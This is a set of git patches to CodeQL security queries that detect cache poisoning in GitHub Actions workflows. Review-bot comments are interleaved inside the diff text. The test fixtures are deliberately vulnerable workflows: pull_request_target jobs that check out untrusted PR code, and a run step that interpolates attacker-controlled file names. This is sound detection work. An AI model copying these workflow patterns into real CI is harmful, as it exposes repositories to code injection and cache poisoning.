| +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | From fbc2e1e7e807de23e871df121b71b4a41cfc3ec1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 10:47:12 +0200 Subject: [PATCH 455/707] Remove caching actions that cache files outside of the CWD --- .../actions/security/CachePoisoningQuery.qll | 81 +------------------ 1 file changed, 3 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 8c1a9ee0fd78..56002cb2b165 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -51,87 +51,13 @@ abstract class CacheWritingStep extends Step {
 class CacheActionUsesStep extends CacheWritingStep, UsesStep {
 CacheActionUsesStep() { this.getCallee() = "actions/cache" }
- override string getPath() {
- if exists(this.(UsesStep).getArgument("path"))
- then result = this.(UsesStep).getArgument("path").splitAt("\n")
- else result = "?"
- }
+ override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") }
 }
 class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep {
 CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" }
- override string getPath() {
- if exists(this.(UsesStep).getArgument("path"))
- then result = this.(UsesStep).getArgument("path").splitAt("\n")
- else result = "?"
- }
-}
-
-class SetupJavaUsesStep extends CacheWritingStep, UsesStep {
- SetupJavaUsesStep() {
- this.getCallee() = "actions/setup-java" and
- (
- exists(this.getArgument("cache")) or
- exists(this.getArgument("cache-dependency-path"))
- )
- }
-
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
-}
-
-class SetupGoUsesStep extends CacheWritingStep, UsesStep {
- SetupGoUsesStep() {
- this.getCallee() = "actions/setup-go" and
- (
- not exists(this.getArgument("cache"))
- or
- this.getArgument("cache") = "true"
- )
- }
-
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
-}
-
-class SetupNodeUsesStep extends CacheWritingStep, UsesStep {
- SetupNodeUsesStep() {
- this.getCallee() = "actions/setup-node" and
- (
- exists(this.getArgument("cache")) or
- exists(this.getArgument("cache-dependency-path"))
- )
- }
-
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
-}
-
-class SetupPythonUsesStep extends CacheWritingStep, UsesStep {
- SetupPythonUsesStep() {
- this.getCallee() = "actions/setup-python" and
- (
- exists(this.getArgument("cache")) or
- exists(this.getArgument("cache-dependency-path"))
- )
- }
-
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
-}
-
-class SetupDotnetUsesStep extends CacheWritingStep, UsesStep {
- SetupDotnetUsesStep() {
- this.getCallee() = "actions/setup-dotnet" and
- (
- this.getArgument("cache") = "true" or
- exists(this.getArgument("cache-dependency-path"))
- )
- }
-
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
+ override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") }
 }
 class SetupRubyUsesStep extends CacheWritingStep, UsesStep {
@@ -140,6 +66,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep {
 this.getArgument("bundler-cache") = "true"
 }
- // TODO: Try to get the actual path being cached
- override string getPath() { result = "?" }
+ override string getPath() { result = "vendor/bundle" }
 }
From d18179850d6fc9557172372376dfc81aa993c939 Mon Sep 17 00:00:00 2001
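Review bot: The new one-line `getPath()` bodies for `CacheActionUsesStep` and `CacheActionSaveUsesStep` have no result at all when the `path` argument is absent, whereas the removed `if exists(...) ... else result = "?"` form reported the path as unknown; since the queries treat "?" as "unknown cached path", such a step now silently stops matching instead of being flagged as unknown. If this relies on `path` being a required input of those actions, state it, e.g. `// path is a required input of actions/cache(/save), so no "?" fallback is needed`; otherwise keep the `else result = "?"` branch. In the second hunk, `SetupRubyUsesStep` now hard-codes `vendor/bundle`, presumably the action's default `bundler-cache` location; a comment recording that assumption (and that a custom `BUNDLE_PATH` is not handled) would let the next maintainer check it against the action's documentation.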
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:04:34 +0200 Subject: [PATCH 456/707] Split Cache Poisoning queries in 3 Split them into 3 queries depending of how the cache can be poisoned: - control of cached files - execution of controlled code - code injection Remove `setup-XXX` actions from CacheWriting class since the cached files are not in the CWD --- ...n.ql => CachePoisoningViaCodeInjection.ql} | 2 +- ...ing.ql => CachePoisoningViaDirectCache.ql} | 49 ++++------ .../CachePoisoningViaPoisonableStep.ql | 58 +++++++++++ .../{test9.yml => code_injection1.yml} | 0 .../.github/workflows/code_injection2.yml | 16 +++ .../{test1.yml => direct_cache1.yml} | 0 .../{test2.yml => direct_cache2.yml} | 0 .../{test11.yml => direct_cache3.yml} | 0 .../{test15.yml => direct_cache4.yml} | 0 .../{test16.yml => direct_cache5.yml} | 0 .../{test23.yml => direct_cache6.yml} | 0 .../{test10.yml => neg_code_injection1.yml} | 0 .../{test13.yml => neg_direct_cache1.yml} | 0 .../{test14.yml => neg_direct_cache2.yml} | 0 .../{test22.yml => neg_direct_cache3.yml} | 0 .../{test12.yml => neg_poisonable_step1.yml} | 0 .../{test18.yml => neg_poisonable_step2.yml} | 16 +-- .../CWE-349/.github/workflows/poc.yml | 63 ------------ .../CWE-349/.github/workflows/poc2.yml | 58 ----------- .../CWE-349/.github/workflows/poc3.yml | 64 ------------ .../{test8.yml => poisonable_step1.yml} | 0 .../{test17.yml => poisonable_step2.yml} | 0 .../.github/workflows/poisonable_step3.yml | 19 ++++ .../.github/workflows/poisonable_step4.yml | 18 ++++ .../.github/workflows/poisonable_step5.yml | 28 ++++++ .../CWE-349/.github/workflows/test19.yml | 42 -------- .../CWE-349/.github/workflows/test20.yml | 46 --------- .../CWE-349/.github/workflows/test21.yml | 44 --------- .../CWE-349/.github/workflows/test3.yml | 23 ----- .../CWE-349/.github/workflows/test4.yml | 21 ---- .../CWE-349/.github/workflows/test5.yml | 19 ---- .../CWE-349/.github/workflows/test6.yml | 18 ---- 
.../CWE-349/.github/workflows/test7.yml | 17 ---- .../Security/CWE-349/CachePoisoning.expected | 98 ------------------- .../Security/CWE-349/CachePoisoning.qlref | 2 - .../CachePoisoningByCodeInjection.expected | 20 ---- .../CachePoisoningByCodeInjection.qlref | 2 - .../CachePoisoningViaCodeInjection.expected | 11 +++ .../CachePoisoningViaCodeInjection.qlref | 2 + .../CachePoisoningViaDirectCache.expected | 48 +++++++++ .../CachePoisoningViaDirectCache.qlref | 2 + .../CachePoisoningViaPoisonableStep.expected | 49 ++++++++++ .../CachePoisoningViaPoisonableStep.qlref | 2 + 43 files changed, 275 insertions(+), 582 deletions(-) rename ql/src/Security/CWE-349/{CachePoisoningByCodeInjection.ql => CachePoisoningViaCodeInjection.ql} (96%) rename ql/src/Security/CWE-349/{CachePoisoning.ql => CachePoisoningViaDirectCache.ql} (68%) create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test9.yml => code_injection1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test1.yml => direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test2.yml => direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test11.yml => direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test15.yml => direct_cache4.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test16.yml => direct_cache5.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test23.yml => direct_cache6.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test10.yml => neg_code_injection1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test13.yml => neg_direct_cache1.yml} (100%) rename 
ql/test/query-tests/Security/CWE-349/.github/workflows/{test14.yml => neg_direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test22.yml => neg_direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test12.yml => neg_poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test18.yml => neg_poisonable_step2.yml} (54%) delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test8.yml => poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test17.yml => poisonable_step2.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected delete mode 100644 
ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql similarity index 96% rename from ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql rename to ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index e7f1385f3cda..685bdcca401f 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -1,5 +1,5 @@ /** - * @name Cache Poisoning via low-privilege code injection + * @name Cache Poisoning via low-privileged code injection * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql similarity index 68% rename from ql/src/Security/CWE-349/CachePoisoning.ql rename to ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 3807cb4b592d..ea36bcf0be1c 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
@@ -1,11 +1,11 @@
 /**
- * @name Cache Poisoning
+ * @name Cache Poisoning via caching of untrusted files
 * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
 * @kind path-problem
 * @problem.severity error
 * @precision high
 * @security-severity 7.5
- * @id actions/cache-poisoning
+ * @id actions/cache-poisoning/direct-cache
 * @tags actions
 * security
 * external/cwe/cwe-349
@@ -45,6 +45,8 @@ query predicate edges(Step a, Step b) { a.getNextStep() = b }
 from LocalJob j, Event e, Step source, Step s, string message, string path
 where
+ // the job checkouts untrusted code from a pull request or downloads an untrusted artifact
+ j.getAStep() = source and
 (
 source instanceof PRHeadCheckoutStep and
 message = "due to privilege checkout of untrusted code." and
@@ -54,46 +56,35 @@ where
 message = "due to downloading an untrusted artifact." and
 path = source.(UntrustedArtifactDownloadStep).getPath()
 ) and
+ // the checkout/download is not controlled by an access check
+ not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and
 j.getATriggerEvent() = e and
 // job can be triggered by an external user
 e.isExternallyTriggerable() and
- // the checkout is not controlled by an access check
- not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and
 (
 // the workflow runs in the context of the default branch
 runsOnDefaultBranch(e)
 or
- // the workflow caller runs in the context of the default branch
+ // the workflow's caller runs in the context of the default branch
 e.getName() = "workflow_call" and
 exists(ExternalJob caller |
 caller.getCallee() = j.getLocation().getFile().getRelativePath() and
 runsOnDefaultBranch(caller.getATriggerEvent())
 )
 ) and
- // the job checkouts untrusted code from a pull request
- j.getAStep() = source and
+ // the job writes to the cache
+ // (No need to follow the checkout/download step since the cache is normally write after the job completes)
+ j.getAStep() = s and
+ s instanceof CacheWritingStep and
 (
- // the job writes to the cache
- // (No need to follow the checkout step as the cache writing is normally done after the job completes)
- j.getAStep() = s and
- s instanceof CacheWritingStep and
- (
- // we dont know what code can be controlled by the attacker
- path = "?"
- or
- // we dont know what files are being cached
- s.(CacheWritingStep).getPath() = "?"
- or
- // the cache writing step reads from the path the attacker can control
- not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path)
- ) and
- not s instanceof PoisonableStep
+ // we dont know what code can be controlled by the attacker
+ path = "?"
 or
- // the job executes checked-out code
- // (The cache specific token can be leaked even for non-privileged workflows)
- source.getAFollowingStep() = s and
- s instanceof PoisonableStep and
- // excluding privileged workflows since they can be exploited in easier circumstances
- not j.isPrivileged()
- )
+ // we dont know what files are being cached
+ s.(CacheWritingStep).getPath() = "?"
+ or
+ // the cache writing step reads from a path the attacker can control
+ not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path)
+ ) and
+ not s instanceof PoisonableStep
 select s, source, s, "Potential cache poisoning in the context of the default branch " + message
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
new file mode 100644
index 000000000000..ee2719f06112
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
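Review bot: The retained branch `s.(CacheWritingStep).getPath() = "?"` ("we dont know what files are being cached") may now be unreachable, because the preceding commit removed every visible `getPath()` override that returned "?"; unless a `CacheWritingStep` subclass outside this diff still yields "?", the branch is dead and should be dropped or annotated with the subclass it is kept for. The added comment `// (No need to follow the checkout/download step since the cache is normally write after the job completes)` would read more precisely as `// (s need not come after the checkout/download step: the cache is normally written after the job completes)`. With `not s instanceof PoisonableStep` here and `not j.isPrivileged()` in the new poisonable-step query, a step that is both cache-writing and poisonable in a privileged job is reported by neither query; if no step type can be both, a one-line comment saying so would prevent the question from being re-asked, and if one can, a test case for it is missing.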
@@ -0,0 +1,58 @@
+/**
+ * @name Cache Poisoning via execution of untrusted code
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/cache-poisoning/poisonable-step
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ */
+
+import actions
+import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.CachePoisoningQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
+
+from LocalJob j, Event e, Step source, Step s, string message, string path
+where
+ // the job checkouts untrusted code from a pull request or downloads an untrusted artifact
+ j.getAStep() = source and
+ (
+ source instanceof PRHeadCheckoutStep and
+ message = "due to privilege checkout of untrusted code." and
+ path = source.(PRHeadCheckoutStep).getPath()
+ or
+ source instanceof UntrustedArtifactDownloadStep and
+ message = "due to downloading an untrusted artifact." and
+ path = source.(UntrustedArtifactDownloadStep).getPath()
+ ) and
+ // the checkout/download is not controlled by an access check
+ not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and
+ j.getATriggerEvent() = e and
+ // job can be triggered by an external user
+ e.isExternallyTriggerable() and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(e)
+ or
+ // the workflow's caller runs in the context of the default branch
+ e.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = j.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ ) and
+ // the job executes checked-out code
+ // (The cache specific token can be leaked even for non-privileged workflows)
+ source.getAFollowingStep() = s and
+ s instanceof PoisonableStep and
+ // excluding privileged workflows since they can be exploited in easier circumstances
+ not j.isPrivileged()
+select s, source, s, "Potential cache poisoning in the context of the default branch " + message
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml
new file mode 100644
index 000000000000..9c87340d7ab6
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml
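Review bot: `path` is bound from `source.(PRHeadCheckoutStep).getPath()` and `source.(UntrustedArtifactDownloadStep).getPath()` but never used afterwards in this query, so its only effect is as a filter: a checkout or download step whose `getPath()` has no result is silently excluded even though this query does not depend on which path was checked out. Unless both `getPath()` predicates are known to be total, drop `string path` and the two `path = ...` conjuncts, or add `// path is unused here; binding it only ensures the source has a resolvable path` so the intent is explicit. The conjunct `not exists(ControlCheck check | check.protects(source, j.getATriggerEvent()))` quantifies over any trigger event of the job rather than the selected `e`, so a check that protects one trigger suppresses the alert for every other externally-triggerable event of the same job; if that is intended a comment would help, otherwise `check.protects(source, e)` after `e` is bound is the narrower form.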
@@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml similarity index 54% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml index 6bfdc5b7d50a..be1533f22312 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -5,27 +5,13 @@ on: push: branches: - main - - 'releases/*' jobs: - verify-build: + test: runs-on: ubuntu-latest - steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version-file: .nvmrc - - - name: Install NPM dependencies - run: npm ci - - - name: Rebuild the dist/ directory - run: npm run build - - name: Compare the expected and actual dist/ directories run: bin/check-build-output-in-dist-directory diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml deleted file mode 100644 index 6900c3bc23fa..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml +++ /dev/null 
@@ -1,63 +0,0 @@ -# This workflow uses actions that are not certified by GitHub. -# They are provided by a third-party and are governed by -# separate terms of service, privacy policy, and support -# documentation. - -# Sample workflow for building and deploying a Jekyll site to GitHub Pages -name: Deploy Jekyll site to Pages preview environment -on: - # Runs on pull requests targeting the default branch - pull_request_target: - branches: ["main"] -# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages -permissions: - contents: read - pages: write - id-token: write -# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. -# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. -concurrency: - group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' - cancel-in-progress: false -jobs: - # Build job - build: - # Limit permissions of the GITHUB_TOKEN for untrusted code - permissions: - contents: read - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - with: - # For PRs make sure to checkout the PR branch - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages - uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll - uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 - with: - source: ./ - destination: ./_site - - name: Upload artifact - # Automatically uploads an artifact from the './_site' directory by default - uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 - # Deployment job - deploy: - environment: - name: 'Pages Preview' - url: ${{ steps.deployment.outputs.page_url }} - # Sets permissions of the GITHUB_TOKEN to allow deployment to 
